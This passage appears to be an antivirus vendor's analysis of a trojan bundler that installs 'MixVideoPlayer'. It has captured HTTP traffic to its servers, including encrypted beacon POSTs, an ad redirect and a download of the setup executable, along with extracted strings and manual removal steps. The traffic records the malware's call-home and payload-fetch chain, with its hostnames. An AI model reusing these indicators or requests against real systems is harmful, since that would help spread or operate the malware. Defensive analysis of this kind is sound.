User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36
Host: static.api.yousoftpe.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 06 Jun 2015 00:25:48 GMT
Content-Type: application/octet-stream
Content-Length: 940304
Connection: keep-alive
Last-Modified: Thu, 26 Feb 2015 12:10:04 GMT
ETag: "54ef0d1c-e5910"
Accept-Ranges: bytes

<<< skipped >>>

GET /BesH3gE9/pop-up/ HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.yousoftpe.com
Connection: Keep-Alive


HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Sat, 06 Jun 2015 00:26:04 GMT
Content-Type: text/html
Content-Length: 178
Connection: keep-alive
Location: hXXp://n149adserv.com/ads?key=5d7c4c519bcd79cc1dca058af3cfebbc&width=0&height=0
<html>
<head><title>301 Moved Permanently</title></head>
<body bgcolor="white">
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx</center>
</body>
</html>


GET /__maxpower__/render_template/2014/11/71be70f4-73cf-11e4-b71d-06a3579b0dab?language_code=en HTTP/1.1
Accept: */*
Proxy-Authorization: Basic 
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36
Host: api.yousoftpe.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 06 Jun 2015 00:25:59 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 2387
Connection: keep-alive
Vary: Accept-Language
Content-Language: en
Accept-Ranges: bytes
<!--Template VideoUpdater-->
<div class="container">
<div class="videupdater">
  <div class="minimize">
    <ul>
      <li><span onclick="minimizeWindow();" class="button-min">-</span></li>
      <li><span id="_Bexit" onclick="onExit()" class="button-min">x</span></li>
    </ul>
</div>
<div id="_frameContainer" class="content">
</div>
<!-- buttons -->
<div class="buttons">
  <!--botones derecha -->
  <input id="_Bnext" class="_Bnext grey right" buttonText="Next" tabindex="0" type="submit" value="Next »" onclick='onAccept();'>
  <!--botones izquierda -->
  <input id="_Bomit" class="_Bomit normal-close leftnowidth" tabindex="3" type="submit" name="nombre" value="Skip All" onclick='onOmit();'>
  <input id="_Bdecline" class="_Bdecline normal-close leftnowidth" tabindex="1" type="submit"  name="nombre" value="Decline" onclick='onDecline();'>
  <div class="clear"></div>
</div>
<div class="contact">
  <div class="contact-in" style="height: 20px;">
    <ul>
      <li><a target='_blank' class="first _TitPrivacy">Privacy Policy</a></li>
      <li><a target='_blank' class="_TitSetup">Setup info</a></li>
      <li><a target='_blank' class="_TitFree">Why is this free?</a></li>
      <li><a target='_blank' class="_TitHelp">Help

<<< skipped >>>

GET /ded3de8ff3bf627ff6d83ea047844f0e91a95b1e757f4fb79ebb72e5215a43a3f1881186e28a14e9dcb327b6a4c44792123f9c4262bdb9bd14978d4785a634ebd1ab2fad42c3ac69be4103bbb5ace2eb9d729a9f30d3fd91 HTTP/1.1
Accept: */*
Proxy-Authorization: Basic 
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36
Host: api.yousoftpe.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 06 Jun 2015 00:25:56 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive

<<< skipped >>>

POST /bf347a9c266220e0e770ae69b02713632b85a487869a70dd771b22fb58989f9aa3ebc8497ffa6be434bb903bf4e644ccef8f18175e98e50b HTTP/1.1

User-Agent: dBrowser 1 CallGetResponse:1
Host: api.yousoftpe.com
Content-Length: 2726
Cache-Control: no-cache

cdata=86394263D6DED7AD3ED013DFEF7E64F6C29F5997166EF97A418F915F82A9AD7FC77F5FC74ED02F99799278738B97993DFA484DED0643C147AF1F76E6047AAC12B04F4D1B9014C49B2B9206253F7B816F613C3C2381141BF9CF3270815E833E217C84153888AF84AD3B25072B7234318ADB6B796AA64B779F2A2FFAABF95EFDC11241AEEFDE629155B76CCA2A4F117755C06DE1498E9C37CD98B521F0FD403F13CB01AF0E4FBF71138F6A88730187FF335D1D49628715144B0C70D3E9EFE7F238A0BD4DC3850AA17491D1411F679F649D153C8BB58D807D75C71D684597E3C53158883877E2B2DF5F9835210215BF8B4E424D54C9DC1B0382804C82DF6DE430D6286F4EC32EFA9C0879E0B5195F873EC93EFD9028384F794BA8001AAD0EFD2F57163951F48C0543140FA71C2CC25B1E684F083496E91153CD0189459D14D516740D975556EED463D549149C64F7817B04107DF3BD3AADB9D05FF4CA61C16FFA52B0B03FC804758BA2BBFE11F6894C15F67736AE213BCEFDF4413BB9970F70654B7C300116460FAB905A38A5DA3C219D77E5831422B475F8B98F771450C586E4A98C88422A4D2D55FEBEE8C1F50ED3ADDFD386B54BF360ED09327D06513E427FC52942CDABED860F111BDC58F37DAE1E5804B1D324B29777FFAC9632ED0D917F4E2248AF23B7B71F695AF748841602CCAB4C9C1AE20FB19194BE091E0473A3F10155839159F39D6F3E214794CCBA7519CA5A4640C97FFA3822F34CD7DECFE5253E6F5174F71615E7B4A511A96AE360D51CD33B6E803EC4587E00F7ABA679F9E761A3A25D92E107FEB662888D7119708C2ADF11E2F8B0966F45D228EF5963AC1CC6D27AA0644310EAA5088161C2C7E149BED5C76FB36C5CD2587FD058855B0D9BA3ADAED
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 06 Jun 2015 00:25:58 GMT
Content-Type: text/plain
Transfer-Encoding: chunked
Connection: keep-alive
7..MAXTHX...0......


GET /maxpower-static/templates/2014/11/71be70f4-73cf-11e4-b71d-06a3579b0dab/css/images/loading-install.gif HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: api.yousoftpe.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 06 Jun 2015 00:26:00 GMT
Content-Type: image/gif
Content-Length: 7928
Last-Modified: Fri, 27 Feb 2015 14:06:59 GMT
Connection: keep-alive
ETag: "54f07a03-1ef8"
Accept-Ranges: bytes

<<< skipped >>>

GET /maxpower-static/templates/2014/11/71be70f4-73cf-11e4-b71d-06a3579b0dab/css/images/loadingBar.gif HTTP/1.1

Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: api.yousoftpe.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 06 Jun 2015 00:26:00 GMT
Content-Type: image/gif
Content-Length: 77170
Last-Modified: Fri, 27 Feb 2015 14:07:01 GMT
Connection: keep-alive
ETag: "54f07a05-12d72"
Accept-Ranges: bytes

<<< skipped >>>

GET /__maxpower__/render_screen/2014/11/a888aa68-73d0-11e4-b71d-06a3579b0dab/screen_variation=videoUpdater HTTP/1.1

Accept: */*
Proxy-Authorization: Basic 
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36
Host: api.yousoftpe.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 06 Jun 2015 00:26:09 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 814
Connection: keep-alive
Vary: Accept-Language
Content-Language: en
Accept-Ranges: bytes
<!--finish Videoupdater-->
<div class="finish">
<h1>Setup Wizard</h1>
<p style="margin-top: 15px; font-size: 13px;">You have succesfully installed the software below and they are ready to be used:</p>
<div class="items">
<ul>
<li class="check">%mapp%</li>
</ul>
</div>
<div class="clear"></div>
<p>Recommended offers:</p>
<div class="list-toolbars" id="alloffers">
<ul class="_FinishOffers">
</ul>
</div>
<!--
<div class="banner">
<iframe src="hXXp://n149adserv.com/ads?key=09879bcf6e631312a2c4d02d9cae272f&width=300&height=250" frameborder='0' scrolling='no' width='300' height='250'></iframe>
</div>
-->
<input id="_Bexit" class="_Bexit close absol" tabindex="2" type="submit" name="nombre" onclick='onExit()' value="Close">
</div>


GET /maxpower-static/apps/34/68794/css/style.css HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: api.yousoftpe.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 06 Jun 2015 00:25:59 GMT
Content-Type: text/css
Content-Length: 114
Last-Modified: Mon, 16 Mar 2015 11:21:34 GMT
Connection: keep-alive
ETag: "5506bcbe-72"
Accept-Ranges: bytes
/* mapp MixVideoPlayer */
.welcome ul  {
	width:210px;
	float: left;
}
.welcome ul li {
	margin-top: 10px;
}



GET /__maxpower__/render_screen/2014/11/8b9c3fb4-73d0-11e4-925e-06a3579b0dab/screen_variation=videoUpdater HTTP/1.1

Accept: */*
Proxy-Authorization: Basic 
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36
Host: api.yousoftpe.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 06 Jun 2015 00:26:00 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 961
Connection: keep-alive
Vary: Accept-Language
Content-Language: en
Accept-Ranges: bytes
<!--Intall Videoupdater-->
<div class="install">
    <h1>Installation Progress</h1>
    <p>This Download Manager will minimize to your system tray shortly to allow you to work on other items while your selections install. To restore this window, simply click on the icon in your system tray.</p>
    <div class="install-loading">
    </div>
    <div class="progress-bar">
        <div class="_TotalProgressLevel progress-level" ></div>
    </div>
    <div class="clear" style="height:10px; display:block;"></div>
    <div class="_ProgressInstallingText" style="display:none; text-align: center; margin-left: 45px; width: 422px;"><p>Installing ...</p></div>
    <div class="_ProgressText" style="display:none; margin-left: 33px;">
        <p>Process: <span class="_ProgressTextDownloaded"></span>  of <span class="_ProgressTextTotal"></span> (<span class="_ProgressTextPercentage"></span> %)</p>
    </div>
</div>



GET /maxpower-static/templates/2014/11/71be70f4-73cf-11e4-b71d-06a3579b0dab/css/images/i-download.png HTTP/1.1

Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: api.yousoftpe.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 06 Jun 2015 00:26:00 GMT
Content-Type: image/png
Content-Length: 1433
Last-Modified: Fri, 27 Feb 2015 14:06:57 GMT
Connection: keep-alive
ETag: "54f07a01-599"
Accept-Ranges: bytes

<<< skipped >>>

GET /maxpower-static/templates/2014/11/71be70f4-73cf-11e4-b71d-06a3579b0dab/css/images/progress-bar.png HTTP/1.1

Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: api.yousoftpe.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 06 Jun 2015 00:26:00 GMT
Content-Type: image/png
Content-Length: 1392
Last-Modified: Fri, 27 Feb 2015 14:07:04 GMT
Connection: keep-alive
ETag: "54f07a08-570"
Accept-Ranges: bytes

<<< skipped >>>

POST /88e3cdf5a5346baa2b731227e7a325392c7d17c057f36ec1aa728dd48813418e75a639a1f3c174651b0f651572207b831c51a60cc8716716 HTTP/1.1

User-Agent: dBrowser 2 CallGetResponse:2
Host: api.yousoftpe.com
Content-Length: 4006
Cache-Control: no-cache

cdata=86394263D6DED7AD3ED013DFEF7E64F6FD7F7EB6471F6E1008FAF67D6BFDB01B26EAAA801BC7C09F4151D3761C9F974F6921D434084F69EB0E2262EC981EFAF4B71B6DE53AB1621839F9301B469E85E3DEEA269604ED17849843D57DA5D052460EA403F0E2730A705291EE1BB655062579317F3835A3F1C8D611E8D59DE4E29330C729C3611175A91D6C4B2CA57BF51B8A93E962C0C6C7C6FD68E8538140D7179A18D7BCE232EF1C1C0A61A0FC128EFA35879CE800C42FE7ED6DD7260C2A734FD494B2C250259201C61772E42F1834C5441D06379FFA40F46894C31933E48BDA957A476C0D2DA52AB22D25163CA51C0265C33430C2CCDC2445DB733784FAF2387F2028217CF16B47693BE71A94A31D04FEC270C62AA77F5607A856310D3163700B9358E90F7D346FCC65CFCEB261A852FC730CFC5512A46C99D7521B0CEB0A7AB836EB90C4968390E70FBE66142A024A56DCD1FF2C37F69104A76D9C65E8C995026485C84E02B717CB69E1DEE79A5B7163A85418804D4732B853988DC447F077EDBE26ADDD2D6491B936C16D6FDA0CBE8C32A9E47A43291E06605D7327A003427FA57088F709FEA77EF306CA4BFEF54BDAEDF7E4F54FF66DB4CD09C36F722294E15B4466C6626B87D934840432CEAB2D0F2D5CD256D16454ADD9ACD51EA2376FD7ABDAC2DC20C1CE4FC529377AACD629FFED22A89B2F4422D24E82882AF7AA2C1A16BB81C3838A8D3EB3E18BBEF18D60DC1B234AC6A358521720470391E8CFDF41099A29F798B6EC70E827139413E513DA51D7708F4957B91AC64EBB6FD47BCACAF081BD0D876AEEB0C3A09A3ED5BA4F85EBBC8F97F88B9899F77E1B84AD58BCEBFBA8B236534DAF1C60FCFEF16CB364963AB371E91C1C08792FDC29952F850065D8D
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 06 Jun 2015 00:26:09 GMT
Content-Type: text/plain
Transfer-Encoding: chunked
Connection: keep-alive
7..MAXTHX...0..


GET /84/MixVideoPlayerSetup.exe HTTP/1.1
Accept: */*
Proxy-Authorization: Basic 
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36
Host: static.yousoftpe.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 06 Jun 2015 00:26:04 GMT
Content-Type: application/octet-stream
Content-Length: 3789056
Connection: keep-alive
Last-Modified: Fri, 05 Jun 2015 11:17:43 GMT
ETag: "55718557-39d100"
Accept-Ranges: bytes
<<< skipped >>>

GET /?s1=&s2=&s3= HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 3p6.popularfastchannel.com
Connection: Keep-Alive


HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Date: Sat, 06 Jun 2015 00:26:06 GMT
Location: hXXp://ASMzz.exclusiverewards.startree.science/?sov=73001201&hid=hljlntjxhrlrjrz&redid=10845&gsid=68&id=XNSX.-r10845-t68
Server: nginx/1.2.8
X-Powered-By: PHP/5.3.23
Content-Length: 0
Connection: keep-alive


The Trojan connects to the servers at the following location(s):

%original file name%.exe_1896:

`.rsrc
%Program Files% (x86)\Microsoft Visual Studio 9.0\VC\atlmfc\include\atlexcept.h
%Program Files% (x86)\Microsoft Visual Studio 9.0\VC\include\xdebug
%Program Files% (x86)\Microsoft Visual Studio 9.0\VC\include\streambuf
%Program Files% (x86)\Microsoft Visual Studio 9.0\VC\include\xlocnum
%Program Files% (x86)\Microsoft Visual Studio 9.0\VC\include\xlocale
%Program Files% (x86)\Microsoft Visual Studio 9.0\VC\include\xiosbase
%Program Files% (x86)\Microsoft Visual Studio 9.0\VC\atlmfc\include\cstringt.h
()$^.* ?[]|\-{},:=!
invalid _N_type: %d
%Program Files% (x86)\Microsoft Visual Studio 9.0\VC\include\locale
IsWindowsServer
GetExternal.cpp
helpJavaScript.cpp
NetBase.cpp
PictureEx.cpp
c:\logFile.txt
Error opening key.
Key not found.
CheckRegistryKeyExistance
SetStringKey
"exeId":"
inflate 1.1.3 Copyright 1995-1998 Mark Adler
1.1.3
CWebBrowser2
0.0.0.0
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olemisc.cpp
CNotSupportedException
#Unable to load mail system support.

%original file name%.exe_1896_rwx_00401000_001E2000:

f:\dd\vctools\vc7libs\ship\atlmfc\include\atlcomtime.inl
f:\dd\vctools\vc7libs\ship\atlmfc\include\atlcore.h
f:\dd\vctools\vc7libs\ship\atlmfc\src\atl\atls\allocate.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\atl\atls\atltracemodulemanager.h
mode == _CRT_RPTHOOK_INSTALL || mode == _CRT_RPTHOOK_REMOVE
wcscpy_s(szOutMessage, 4096, L"_CrtDbgReport: String too long or IO Error")
memcpy_s(szShortProgName, sizeof(TCHAR) * (260 - (szShortProgName - szExeName)), dotdotdot, sizeof(TCHAR) * 3)
wcscpy_s(szExeName, 260, L"<program name unknown>")
__crtMessageWindowW
f:\dd\vctools\crt_bld\self_x86\crt\src\vswprint.c
f:\dd\vctools\crt_bld\self_x86\crt\src\memcpy_s.c
f:\dd\vctools\crt_bld\self_x86\crt\src\memmove_s.c
f:\dd\vctools\crt_bld\self_x86\crt\src\tcscat_s.inl
f:\dd\vctools\crt_bld\self_x86\crt\src\wcstombs.c
f:\dd\vctools\crt_bld\self_x86\crt\src\tsplitpath_s.inl
f:\dd\vctools\crt_bld\self_x86\crt\src\tmakepath_s.inl
f:\dd\vctools\crt_bld\self_x86\crt\src\stat64.c
f:\dd\vctools\crt_bld\self_x86\crt\src\wcsicmp.c
f:\dd\vctools\crt_bld\self_x86\crt\src\printf.c
f:\dd\vctools\crt_bld\self_x86\crt\src\strtol.c
f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c
_CrtCheckMemory()
_CrtIsValidHeapPointer(pUserData)
_CrtSetDbgFlag
(fNewBits==_CRTDBG_REPORT_FLAG) || ((fNewBits & 0x0ffff & ~(_CRTDBG_ALLOC_MEM_DF | _CRTDBG_DELAY_FREE_MEM_DF | _CRTDBG_CHECK_ALWAYS_DF | _CRTDBG_CHECK_CRT_DF | _CRTDBG_LEAK_CHECK_DF) ) == 0)
_CrtMemCheckpoint
f:\dd\vctools\crt_bld\self_x86\crt\src\fclose.c
f:\dd\vctools\crt_bld\self_x86\crt\src\fread.c
f:\dd\vctools\crt_bld\self_x86\crt\src\rewind.c
f:\dd\vctools\crt_bld\self_x86\crt\src\ftell.c
f:\dd\vctools\crt_bld\self_x86\crt\src\fseek.c
f:\dd\vctools\crt_bld\self_x86\crt\src\fopen.c
f:\dd\vctools\crt_bld\self_x86\crt\src\fprintf.c
f:\dd\vctools\crt_bld\self_x86\crt\src\wprintf.c
nf:\dd\vctools\crt_bld\self_x86\crt\src\strftime.c
("Invalid MBCS character sequence passed to strftime",0)
("Invalid MBCS character sequence passed into strftime",0)
f:\dd\vctools\crt_bld\self_x86\crt\src\malloc.h
("Corrupted pointer passed to _freea", 0)
f:\dd\vctools\crt_bld\self_x86\crt\src\loctim64.c
f:\dd\vctools\crt_bld\self_x86\crt\src\fwrite.c
f:\dd\vctools\crt_bld\self_x86\crt\src\ungetc.c
f:\dd\vctools\crt_bld\self_x86\crt\src\ungetc_nolock.inl
f:\dd\vctools\crt_bld\self_x86\crt\src\fgetc.c
f:\dd\vctools\crt_bld\self_x86\crt\src\fgetpos.c
f:\dd\vctools\crt_bld\self_x86\crt\src\fsetpos.c
f:\dd\vctools\crt_bld\self_x86\crt\src\fputc.c
f:\dd\vctools\crt_bld\self_x86\crt\src\atof.c
f:\dd\vctools\crt_bld\self_x86\crt\src\wtof.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mktime64.c
f:\dd\vctools\crt_bld\self_x86\crt\src\wcslwr.c
f:\dd\vctools\crt_bld\self_x86\crt\src\tcscpy_s.inl
f:\dd\vctools\crt_bld\self_x86\crt\src\wcstol.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbsinc.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbsstr.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbschr.c
f:\dd\vctools\crt_bld\self_x86\crt\src\tcsncpy_s.inl
f:\dd\vctools\crt_bld\self_x86\crt\src\wcsdup.c
f:\dd\vctools\crt_bld\self_x86\crt\src\xtoa.c
W_CrtSetReportHook2
strcpy_s(szOutMessage, 4096, "_CrtDbgReport: String too long or IO Error")
strcpy_s(szExeName, 260, "<program name unknown>")
__crtMessageWindowA
f:\dd\vctools\crt_bld\self_x86\crt\src\fullpath.c
f:\dd\vctools\crt_bld\self_x86\crt\src\fileno.c
f:\dd\vctools\crt_bld\self_x86\crt\src\fdopen.c
f:\dd\vctools\crt_bld\self_x86\crt\src\feoferr.c
f:\dd\vctools\crt_bld\self_x86\crt\src\fputws.c
f:\dd\vctools\crt_bld\self_x86\crt\src\fgets.c
f:\dd\vctools\crt_bld\self_x86\crt\src\clearerr.c
fMode == _CRTDBG_REPORT_MODE || (fMode & ~(_CRTDBG_MODE_FILE | _CRTDBG_MODE_DEBUG | _CRTDBG_MODE_WNDW)) == 0
_CrtSetReportMode
f:\dd\vctools\crt_bld\self_x86\crt\src\dbgrptt.c
nRptType >= 0 && nRptType < _CRT_ERRCNT
wcscpy_s(szOutMessage2, 4096, L"_CrtDbgReport: String too long or Invalid characters in String")
strcpy_s(szUserMessage, 4096, "_CrtDbgReport: String too long or IO Error")
_VCrtDbgReportA
strcpy_s(szOutMessage2, 4096, "_CrtDbgReport: String too long or Invalid characters in String")
wcscpy_s(szUserMessage, 4096, L"_CrtDbgReport: String too long or IO Error")
_VCrtDbgReportW
((ptloci->lc_category[category].wlocale != NULL) && (ptloci->lc_category[category].wrefcount != NULL)) || ((ptloci->lc_category[category].wlocale == NULL) && (ptloci->lc_category[category].wrefcount == NULL))
f:\dd\vctools\crt_bld\self_x86\crt\src\fputwc.c
f:\dd\vctools\crt_bld\self_x86\crt\src\ungetwc.c
f:\dd\vctools\crt_bld\self_x86\crt\src\fgetwc.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbstowcs.c
f:\dd\vctools\crt_bld\self_x86\crt\src\a_cmp.c
f:\dd\vctools\crt_bld\self_x86\crt\src\strtod.c
f:\dd\vctools\crt_bld\self_x86\crt\src\vsprintf.c
f:\dd\vctools\crt_bld\self_x86\crt\src\gmtime64.c
KERNEL32.DLL
strcat_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), rterrs[tblindx].rterrtxt)
strcat_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), "\n\n")
strcpy_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), "Runtime Error!\n\nProgram: ")
_NMSG_WRITE
f:\dd\vctools\crt_bld\self_x86\crt\src\crt0msg.c
f:\dd\vctools\crt_bld\self_x86\crt\src\winsig.c
WUSER32.DLL
f:\dd\vctools\crt_bld\self_x86\crt\prebuild\eh\typname.cpp
f:\dd\vctools\crt_bld\self_x86\crt\src\_flsbuf.c
f:\dd\vctools\crt_bld\self_x86\crt\src\intel\fp8.c
f:\dd\vctools\crt_bld\self_x86\crt\prebuild\conv\cvt.c
f:\dd\vctools\crt_bld\self_x86\crt\src\isctype.c
f:\dd\vctools\crt_bld\self_x86\crt\src\dtoxtm64.c
f:\dd\vctools\crt_bld\self_x86\crt\src\expand.c
f:\dd\vctools\crt_bld\self_x86\crt\src\close.c
f:\dd\vctools\crt_bld\self_x86\crt\src\_freebuf.c
f:\dd\vctools\crt_bld\self_x86\crt\src\_filbuf.c
f:\dd\vctools\crt_bld\self_x86\crt\src\lseek.c
f:\dd\vctools\crt_bld\self_x86\crt\src\_open.c
f:\dd\vctools\crt_bld\self_x86\crt\src\timeset.c
f:\dd\vctools\crt_bld\self_x86\crt\src\stricmp.c
f:\dd\vctools\crt_bld\self_x86\crt\src\write.c
f:\dd\vctools\crt_bld\self_x86\crt\src\ftelli64.c
f:\dd\vctools\crt_bld\self_x86\crt\src\fseeki64.c
f:\dd\vctools\crt_bld\self_x86\crt\src\commit.c
f:\dd\vctools\crt_bld\self_x86\crt\prebuild\include\strgtold12.inl
f:\dd\vctools\crt_bld\self_x86\crt\src\getcwd.c
strcpy_s(resultstr, resultsize, autofos.man)
f:\dd\vctools\crt_bld\self_x86\crt\prebuild\conv\cfout.c
f:\dd\vctools\crt_bld\self_x86\crt\src\getqloc.c
f:\dd\vctools\crt_bld\self_x86\crt\src\wctomb.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbtowc.c
_loc_update.GetLocaleT()->locinfo->mb_cur_max == 1 || _loc_update.GetLocaleT()->locinfo->mb_cur_max == 2
f:\dd\vctools\crt_bld\self_x86\crt\src\errmode.c
f:\dd\vctools\crt_bld\self_x86\crt\src\lseeki64.c
f:\dd\vctools\crt_bld\self_x86\crt\src\isatty.c
f:\dd\vctools\crt_bld\self_x86\crt\prebuild\tran\contrlfp.c
f:\dd\vctools\crt_bld\self_x86\crt\src\_fptostr.c
f:\dd\vctools\crt_bld\self_x86\crt\src\open.c
0 && "Only UTF-16 little endian & UTF-8 is supported for reads"
f:\dd\vctools\crt_bld\self_x86\crt\src\mbsnbicm.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbsnbcmp.c
f:\dd\vctools\crt_bld\self_x86\crt\src\getenv.c
f:\dd\vctools\crt_bld\self_x86\crt\prebuild\conv\x10fout.c
f:\dd\vctools\crt_bld\self_x86\crt\src\strnicmp.c
f:\dd\vctools\crt_bld\self_x86\crt\src\wcsnicmp.c
f:\dd\vctools\crt_bld\self_x86\crt\src\setmode.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbsnbico.c
f:\dd\vctools\crt_bld\self_x86\crt\src\strnicol.c
("CRT Logic error during setenv",0)
__crtsetenv
c:\%original file name%.exe
{8856F961-340A-11D0-A96B-00C04FD705A2}
All Files (*.*)
No error message is available.#Attempted an unsupported operation.$A required resource was unavailable.
Command failed.)Insufficient memory to perform operation.PSystem registry entries have been removed and the INI file (if any) was deleted.BNot all of the system registry entries (or INI file) were removed.FThis program requires the file %s, which was not found on this system.tThis program is linked to the missing export %s in the file %s. This machine may have an incompatible version of %s.
Destination disk drive is full.5Unable to read from %1, it is opened by someone else.AUnable to write to %1, it is read-only or opened by someone else.1Encountered an unexpected error while reading %1.1Encountered an unexpected error while writing %1.
#Unable to load mail system support.

iexplore.exe_1032:


WPFFontCache_v0400.exe_3016:


MixVideoPlayer.exe_2876_rwx_03D10000_00010000:

PresentationFramework.classic
PresentationFramework.Aero

MixVideoPlayer.exe_2876_rwx_04970000_00009000:

WindowsFormsIntegration


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    mixvideoplayersetup.exe:1192
    WPFFontCache_v0400.exe:3016
    DeleteTasks.exe:2364
    LTV2.exe:2108
    LTV2.exe:2468
    LTV2.exe:1012

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Program Files%\MixVideoPlayer\Languages\ChineseT.ini (3 bytes)
    %Program Files%\MixVideoPlayer\Languages\Swedish.ini (3 bytes)
    %Program Files%\MixVideoPlayer\Languages\Danish.ini (3 bytes)
    %Program Files%\MixVideoPlayer\Languages\Hungarian.ini (3 bytes)
    %Program Files%\MixVideoPlayer\Languages\Estonian.ini (3 bytes)
    %Program Files%\MixVideoPlayer\dotNetFx40_Full_setup.exe (30344 bytes)
    %Program Files%\MixVideoPlayer\Languages\Slovak.ini (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsw3.tmp\NSISdl.dll (15 bytes)
    %Program Files%\MixVideoPlayer\policy.2.0.taglib-sharp.config (377 bytes)
    %Program Files%\MixVideoPlayer\BrowserWeb.exe (2392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsw3.tmp\SimpleSC.dll (1856 bytes)
    %Program Files%\MixVideoPlayer\references\libreria.png (244 bytes)
    %Program Files%\MixVideoPlayer\Languages\Norwegian.ini (3 bytes)
    %Program Files%\MixVideoPlayer\Languages\German.ini (3 bytes)
    %Program Files%\MixVideoPlayer\references\PhotoLoader.dll (784 bytes)
    %Program Files%\MixVideoPlayer\Languages\Slovenian.ini (3 bytes)
    %Program Files%\MixVideoPlayer\PhotoLoader.dll (784 bytes)
    %Program Files%\MixVideoPlayer\Languages\Czech.ini (3 bytes)
    %Program Files%\MixVideoPlayer\references\mixChecker.exe (27704 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsw3.tmp\AccessControl.dll (15 bytes)
    %Program Files%\MixVideoPlayer\Languages\Polish.ini (3 bytes)
    %Program Files%\MixVideoPlayer\references\Interop.SHDocVw.dll (5064 bytes)
